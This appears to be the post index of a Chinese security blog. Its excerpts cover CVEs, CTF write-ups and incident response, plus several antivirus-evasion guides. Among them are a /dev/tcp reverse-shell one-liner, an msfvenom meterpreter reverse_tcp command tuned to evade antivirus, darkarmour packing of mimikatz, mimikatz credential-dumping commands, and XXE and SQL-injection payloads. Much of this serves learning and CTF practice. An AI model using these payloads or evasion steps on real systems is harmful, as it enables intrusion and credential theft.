- 博客(38)
- 资源 (14)
- 问答 (1)
- 收藏
- 关注
原创 CVE-2023-33246 Apache RocketMQ RCE
Apache RocketMQ是一款开源的分布式消息和流处理平台,提供了高效、可靠、可扩展的低延迟消息和流数据处理能力,广泛用于异步通信、应用解耦、系统集成以及大数据、实时计算等场景。漏洞的官方描述为当RocketMQ多个组件,包括NameServer、Broker和Controller,都暴露在外网,并且缺乏有效的身份认证机制,那么攻击者可以利用更新配置功能,以RocketMQ运行的系统用户身份执行命令。
2023-06-02 11:26:41 1484
原创 CVE-2023-32233 Linux kernel
近日,研究人员发现了Linux内核的NetFilter框架中的新漏洞(CVE-2023-32233)。该漏洞可被本地用户用于将权限提升为root,并完全控制系统。问题的根源在于是如何处理批处理请求的,经过身份验证的本地攻击者可通过发送特制的请求破坏的内部状态,从而获得更高权限。该漏洞影响多个Linux内核版本,包括当前的稳定版本v6.3.1。漏洞原文。
2023-05-16 14:44:44 1932 1
原创 警惕免杀版Gh0st木马!
经过调查发现,这款开源的高度免杀版Gh0st木马目前正在大范围传播,据称可免杀多种主流杀软:开发者不仅制作了新颖的下载页面,还设法增加了搜索引擎的收录权重,吸引了许多免杀马爱好者的下载使用!加强软件下载的安全管理:我们需要加强对开源工具安全的管理和控制,例如在下载前注意审查该开源工具的源码、检查其依赖项、建立安全审查和评估机制等,以减少投毒事件的风险。断开与攻击源的连接:立即断开与该工具的连接,以防止攻击者继续操纵和控制终端;然后需要立即删除相关文件并清理系统。排查安装有该后门软件的主机,及时清理。
2023-05-04 11:03:05 1526
原创 某**集团夺旗赛的一道隐写题
解压压缩包解压出来一个文件file使用file命令进行查看发现是data010查看也无果看到标题是logistic联想到是否与xor文件有关遂使用工具xortool工具在此xortool file选概率最大的那个 (13)xortool file -l 13 -c 00-c表示出现频率最高的字符,根据经验,比如文本内容一般是空格(20),二进制文件一般是00执行命令后出来一个xortool_out文件用010打开0.out文件根据题目提示找到uuidflag{faf5b
2022-04-24 21:12:10 2694
原创 dp in RSA
dp leaking0x01 Calculation idea0x02 What about “p”ergodic xgot (p-1)got pd = gmpy2.invert(e,phi)%phi0x03 Examplese = 65537n = 156808343598578774957375696815188980682166740609302831099696492068246337198792510898818496239166339015207305102101431634
2022-01-28 14:52:32 163
原创 CVE-2021-4034 Polkit
CVE-2021-4034 Polkit0x01 漏洞介绍Polkit是一个应用程序级别的工具集,通过定义和审核权限规则,实现不同优先级进程间的通讯:控制决策集中在统一的框架之中,决定低优先级进程是否有权访问高优先级进程。另外Polkit在系统层级进行权限控制,提供了一个低优先级进程和高优先级进程进行通讯的系统。和sudo等程序不同,Polkit并没有赋予进程完全的root权限,而是通过一个集中的策略系统进行更精细的授权。0x02 漏洞影响版本目前主流Linux版本可能均受影响0x03 漏洞分析
2022-01-26 18:55:26 3400
原创 闲来无事搭个代理池子
基于ProxyPool创建Proxifier代理如题目所见,闲来无事在做测试时发现被某网站封了IP,为防止再被封掉,因此有了这篇文章和搭建过程0x01 安装redis服务ubuntu16.04apt-get install redis-server检查是否服务是否启动ps aux |grep redisnetstat -lanp | grep 6379配置redis.conf文件配置密码及使用远程登参考:https://www.cnblogs.com/wxjnew/p/9189191.
2022-01-12 20:37:58 24148 3
原创 一道CTF题ezinclude引出的蚁剑新姿势
[NPUCTF2020]ezinclude0x01 初探题目查看页面源码fuzz一波出来一个dir.php看看dir.php,关于数组的东西先留着说不定下面有用抓包看看index.php有甚么一个Hash还是蛮醒目的结合刚才的页面信息username&password尝试去拼接url/?name=1&pass=576322dd496b99d07b5b0f7fa7934a25(所给的Hash)拿到一个flflflflag.php访问跳转到了404.h
2021-12-11 22:47:07 3413 2
原创 Linux入侵应急响应思路
Linux入侵应急响应思路0x01 登录情况排查w:用于显示目前登入系统的用户信息,以及正在执行的程序,便于查看当前系统的使用情况last:用于显示用户最近登录信息,可能会留下入侵者的痕迹uptime:查看当前时间、系统运行了多久时间、当前登录的用户有多少,以及前 1、5 和 15 分钟系统的平均负载,便于查看系统的运行状况和负载情况(判断是否挖矿等提供一定凭据)0x02 查询进程情况top:查看资源消耗情况,id表示系统cpu剩余,若该值很小,说明系统可能被用于挖矿等严重占用资源,此
2021-10-25 12:45:38 460 1
原创 深入分析祥云杯easy_yii
深入分析祥云杯easy_yii题目描述yii最新的链子前置知识析构函数__destruct官方解释:析构函数会在到某个对象的所有引用都被删除或者当对象被显式销毁时执行<?phpclass MyDestructableClass { function __construct() { print "In constructor\n"; $this->name = "MyDestructableClass"; } function __de
2021-08-27 11:42:14 369
原创 darkarmour免杀mimikatz
darkarmour免杀mimikatzdarkarmour项目地址:https://github.com/bats3c/darkarmourdarkarmour是一个可用来免杀exe的项目,使用darkarmour来免杀mimikatzUsage:./darkarmour.py -f mimikatz.exe -j -l 5 -e xor -o darkmeter.exe-f:文件加密,如果没有另行说明,则假定为二进制文件-j:使用基于jmp的pe加载器-e:加密算法(异或)-l:加
2021-07-02 11:34:30 588 2
原创 LDAP注入攻击
LDAP注入攻击什么是LDAP?LDAP(Lightweight Directory Access Protocol)轻量级目录访问协议,是一种在线目录访问协议,主要用于目录中资源的搜索和查询,是X.500的一种简便的实现。------“X.500是构成全球分布式的名录服务系统的协议。X.500组织起来的数据就象一个很全的电话号码簿,或者说一个X.500系统象是一个分门别类的图书馆。而某一机构建立和维护的名录数据库只是全球名录数据库的一部分。特点:分散维护,强大的搜索性能。”换句话说LDAP是用于访
2021-06-28 12:02:44 3307 1
原创 xctf攻防世界ics-07 wp
xctf攻防世界ics-07 wp考察知识点:php代码审计、命令执行访问题目地址随便点一点,康康能发现什么发现这里有源码进行php代码审计分析:参数page存在且其值不等于index.php,才会包含flag.php将$ con的内容写入$ file中,但文件后缀名不能为.php3/4/5/6/7/t/html$_SESSION[‘admin’] = True可以满足以上所需此段需要满足参数id存在,id的浮点值不为’1’,id参数的最后一个数值是9可以使用id=1-9
2021-02-20 17:28:37 244 5
原创 xctf攻防世界easysql wp
xctf攻防世界easysql wp考察知识点:SQL注入二次注入python脚本访问题目地址有注册和登录两个功能经测试发现该题目存在二次注入https://www.jianshu.com/p/3fe7904683acusername:'k3vin"/password:k3vinemail:k3vin注册成功后有一个修改密码的页面修改密码,报如下错误猜测并构造payload:1"||extractvalue(1,concat(0x7e,(select(database
2021-02-20 11:08:01 1967
原创 xctf攻防世界smarthacker wp
xctf攻防世界smarthacker wp考察知识点:源码泄露 python脚本访问题目地址下载www.tar.gz我直呼好家伙,三千多个php文件,而且很乱,根本没法看,不过里面包含很多shell不过很多shell都没用,猜测这几千个php文件中肯定含有可以使用的shell,只有写脚本去试了掏出脚本:import requestsimport osimport reimport threadingimport timerequests.adapters.DEFAULT_
2021-02-19 18:06:50 501
原创 xctf攻防世界unagi wp
xctf攻防世界unagi wp访问题目地址点击Upload下的here从信息提示中可以知道要通过编写xml文件上传即通过XXE编码转换成utf-16编码绕过可以利用vim编辑xml文件(取名为2.xml)代码如下:<?xml version='1.0'?><!DOCTYPE users [<!ENTITY xxe SYSTEM "file:///flag" >]><users> <user>
2021-02-19 17:13:39 623 3
原创 CSICTF2020随缘Writeup
CSICTF2020随缘Writeup国外的一个CTF比赛,题目难度适中,这里附上源码及下载地址https://github.com/k3vin-3/CSICTF2020WebCascade考点:CSS文件按F12直接在Network中查看CSS文件,拿到flagcsictf{w3lc0me_t0_csictf}CCC考点:jwt、文件包含在右侧菜单栏中Our Admins和Login不能直接点开,但是通过源代码可以看到链接了两个地址:/adminNames和/login,访问/a
2021-02-06 16:45:20 3440
原创 免杀过火绒
免杀过火绒接上篇文章《免杀过360全家桶》https://blog.csdn.net/weixin_46676743/article/details/1133505001.cs建立监听2.生成payload3.将生成的payload放到kali里编译4.FourEye编译项目地址与具体使用方法:https://github.com/lengjibo/FourEye注意:一定要按照此工具的编译规则install gcc!!5.火绒查杀360查杀6.cs上线.
2021-02-04 17:34:42 2374 9
原创 免杀过360全家桶
免杀过360全家桶1.kali生成一串shellcodemsfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 LHOST=kali的ip地址 LPORT=随便写个端口号(8888、9999都阔以) -f c2.VS编写免杀程序这里给出代码#include <windows.h>#include <stdio.h>(这里是我生成的shellcode)unsigned char
2021-01-28 17:19:14 4031 5
原创 xctf攻防世界honey_shop wp
访问题目地址有1336元,但是要购买Flag需要1337元注意到有一句“click to download our sweet images”,发现访问的是/download?image=1.jpg,这样就可能出现LFI关于LFI:https://www.cnblogs.com/c1e4r/articles/7806819.html试着读一下/proc的相关信息了,/proc/self/永远指向当前进程,尝试读一下environ文件,这记录着当前进程(本题而言是python)的环境变量信息.
2021-01-15 18:15:30 881
原创 xctf攻防世界mark_loves_cat wp
访问题目地址扫描发现/.git/返回 403,使用Githack把源码down下来flag.php<?php$flag = file_get_contents('/flag');index.php<?phpinclude 'flag.php';$yds = "dog";$is = "cat";$handsome = 'yds';foreach($_POST as $x => $y){ $$x = $y;}foreach($_GET as $x.
2021-01-15 15:30:39 258
原创 xctf攻防世界Leaking wp
访问题目地址"use strict";var randomstring = require("randomstring");var express = require("express");var { VM} = require("vm2");var fs = require("fs");var app = express();var flag = require("./config.js").flagapp.get("/", function(req, res) { .
2021-01-15 15:16:27 1710 1
原创 2020羊城杯CTF随缘Writeup
2020羊城杯CTF随缘Writeupdocker源码链接:https://github.com/k3vin-3/YCBCTF2020Web部分a_piece_of_java考点:源码审计、java反序列化PS:这道题没整明白,直接给出官方WP第一步,serialkiller 白名单过滤,构造动态代理触发 JDBC 连接:DatabaseInfo databaseInfo = new DatabaseInfo();databaseInfo.setHost("x.x.x.x");datab
2021-01-09 16:18:58 3761 2
原创 Google Hacking之用法二三
Google Hacking之用法二三Google Hacking是利用谷歌搜索的强大,在浩瀚的互联网中搜索到我们需要的信息。轻量级的搜索可以搜索出一些遗留后门,不想被他人发现的后台入口;中量级的搜索出一些用户信息泄露,源代码泄露,未授权访问等等;重量级的则可能是mdb文件下载,CMS 未被锁定install页面,网站配置密码,php远程文件包含漏洞等重要信息。(谁用谁知道,Google大法真香!!!)利用Google搜索我们想要的信息,需要配合谷歌搜索引擎的一些语法:基本搜索:逻辑与:and逻
2021-01-06 17:19:17 287
原创 看图识WAF-搜集常见WAF拦截页面
看图识WAF-搜集常见WAF拦截页面D盾云锁宝塔网站安全狗智创防火墙西数WTS-WAF腾讯云百度云华为云创宇盾玄武盾阿里云盾360网站卫士奇安信网站卫士长亭SafeLine安恒明御WAFF5 BIG-IPOpenRASP未知云WAF望得到各位大佬的补充和修正!!!...
2021-01-05 17:20:16 1730
原创 phpstudy v8.1搭建DVWA1.9
phpstudy v8.1搭建DVWA1.91、首先官网下载phpstudy和DVWA1.9http://www.phpstudy.net/http://www.dvwa.co.uk/2、将DVWA1.9解压到\phpstudy\phpstudy_pro\WWW下3、phpstudy中开启Apache和MySQL服务,创建网站在根目录中添加域名、端口、DVWA的安装路径及PHP版本(推荐使用php5.4.45)4、将DVWA1.9\config文件夹中的config.inc.php.
2020-12-13 16:34:45 632
原创 一文吃透Linux提权
一文吃透Linux提权转载:https://mp.weixin.qq.com/s?__biz=MzIxMTEyOTM2Ng==&mid=2247491654&idx=1&sn=d9d9b5ffa5cec1ec366620da1be2ffd9&chksm=9758a53fa02f2c299cec6f7f55156c25b641eb5fb528b2c819756baac4f56e442107699ccdb8&mpshare=1&scene=1&srcid
2020-12-03 14:55:50 152
原创 kali Debian x86_64搭建Go语言环境
kali Debian x86_64搭建Go语言环境1、Go 安装包下载地址:https://studygolang.com/dl这里选择Linux版本2、下载后拖入kali中root根目录下3、解压go环境压缩包tar zxvf go1.15.5.linux-amd64.tar.gz4、将go文件包移至该目录下mv go /usr/local/5、创建go语言工作空间mkdir -p $HOME/gomkdir -p go6、配置Go语言环境变量a.使用Vim打开.ba
2020-11-24 15:14:02 365
原创 ReverseTCPShell C2 反弹shell工具
ReverseTCPShell C2 反弹shell工具ReverseTCPShell C2是一款powershell编写的反弹shell工具,流量经过AES加密,payload通过三种混淆方式可绕过一些杀软的检测。Github下载地址:https://github.com/ZHacker13/ReverseTCPShell1、在文件目录下启动powershell2、.\ReverseTCP.ps1 ,启动程序功能介绍,设置好lhost和lport(监听地址及端口)Modules (模块)
2020-11-21 11:56:48 646
原创 弹shell的多种姿势小记
弹shell的多种姿势小记在渗透测试的过程中,当拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接。如果目标主机是linux服务器,一般会选择反弹shell来进行操作,在这里简单总结下反弹shell常见的几种姿势。01、exec 0&0 2>&00<&196;exec 196<>/dev/tcp/your ip/port; sh <&196 >&196 2>&196
2020-11-13 14:20:24 400
原创 Linux登录凭证窃取二三
Linux登录凭证窃取二三1、history命令记录敏感操作Linux系统会自动把用户的操作命令记录到历史列表中,当用户在命令行中输入账号、密码进行登录时,将会导致历史敏感信息泄露。2、mimipenguin抓取密码github下载地址:https://github.com/huntergregal/mimipenguinLinux下的密码抓取神器,需要root权限运行,通过转储进程并提取很可能包含明文密码的行来利用内存中的明文凭证,目前支持Kali、Ubnutu等操作系统。(没有显示密码
2020-10-21 11:43:18 421 2
原创 Windows登录凭证窃取小记
Windows登录凭证窃取小记1、Windows本地密码Hash破解方式一:在线破解http://cmd5.comhttps://www.objectif-securite.ch/ophcrack破解方式二:mimikatzgithub下载地址:https://github.com/gentilkiwi/mimikatz提取Windows系统的明文密码命令:privilege::debugsekurlsa::logonpasswords破解方式三:Powershell+mimika
2020-10-19 12:05:03 683
原创 常见端口漏洞小记
常见端口漏洞众所周知,计算机之间通信是通过端口进行的,例如访问一个网站时,windows就会在本机开放一个端口。(默认状态下,windows会在你的电脑上打开许多服务端口,黑客常常利用这些端口实施入侵)常见端口分类电脑在internet上相互通信需要使用TCP/IP协议,根据TCP/IP协议规定,电脑有256*256(65536)个端口,这些端口可分为TCP端口和UDP端口两种。若按照端口号划分,可分为:系统保留端口(0-1023)80:web服务21:FTP动态端口(1024-65535
2020-10-13 13:00:54 984
原创 Wfuzz小记
**Wfuzz小记**使用wfuzz暴力猜测目录wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://xxx.com/FUZZ使用wfuzz暴力猜测文件wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://xxx.com/FUZZ.php通过在URL中在?后面设置FUZZ占位符,使用wfuzz来测试URL传入的参数wfuzz -z range,0-10
2020-09-22 15:00:11 244
原创 CSRF漏洞小记
CSRF漏洞实例:2007年Gmail的CSRF漏洞https://www.davidairey.com/google-Gmail-security-hijack/#什么是CSRF漏洞Cross-site Request Forgery跨站请求伪造攻击者盗用了你的身份,以你的名义发送恶意请求CSRF能够做的事情:以你的名义发送邮件,发消息,盗取你的账号,甚至于购买商品,虚拟货币转账#CSRF漏洞利用条件–(服务器对客户端的信任)用户已获取服务器认证,登陆网站,并在本地生成cookie(
2020-09-03 18:58:46 208
原创 NMAP之高级用法
–NMAP之高级用法–探测主机存活常用方式-sP:进行ping扫描#打印出对ping扫描做出响应的主机,不做进一步测试nmap -sP 10.1.7.1/24-sn:ping scan - disable port scan #ping探测扫描主机, 不进行端口扫描nmap -sn 10.1.7.1/24-sA:发送tcp的ack包进行探测,可以探测主机是否存活nmap 10.1.7.1 -sA端口扫描的高级用法:sS:半开放扫描 #非3次握手的tcp扫描nmap -
2020-09-03 11:31:19 257
原创 某网站(自建)系统提权之流程
某网站(自建)系统提权之流程1.使用御剑进行网站目录扫描2.扫到疑似后台登录网址,尝试登陆3.尝试弱口令登录,admin username root等,登陆成功4.寻找文件上传位置、备份数据库位置、可能存在的XSS位置等要耐心,后台管理界面功能较多,要逐一尝试(功夫不负有心人,找到了,哈哈哈哈啊)因为此网站是拿asp写的,所以要上传asp的马子,.asp的文件不能上传,把他改成.jpg后缀的图片马,bp抓个包,记下上传的路径5.又在后台某处发现了一个备份数据库,但数据库名字改不了,直
2020-08-26 18:13:11 1116
原创 XSS漏洞与CSRF漏洞
XSS漏洞的简单介绍XSS原称CSS(cross site script),即跨站脚本攻击。是一种经常出现在 web应用中的计算机安全漏洞,它允许恶意 web 用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种类型的漏洞由于被黑客用来编写危害性更大的网络钓鱼(Phishing) 攻击而变得广为人知。对于跨站脚本攻击,黑客界共识是:跨站脚本攻击是新型的“缓冲区溢出攻击”,而Ja
2020-08-26 15:08:29 380
ReverseTCPShell-master.zip
2020-11-21
Gopherus-master.zip
2020-11-13
swap_digger-master.zip
2020-10-21
AntiHoneypot-Chrome-simple-master.zip
2020-10-13
xray-master
2020-09-21
wwwscan.zip
2020-09-03
CSDN如何修改URL中的用户ID?
2021-07-13
TA创建的收藏夹 TA关注的收藏夹
TA关注的人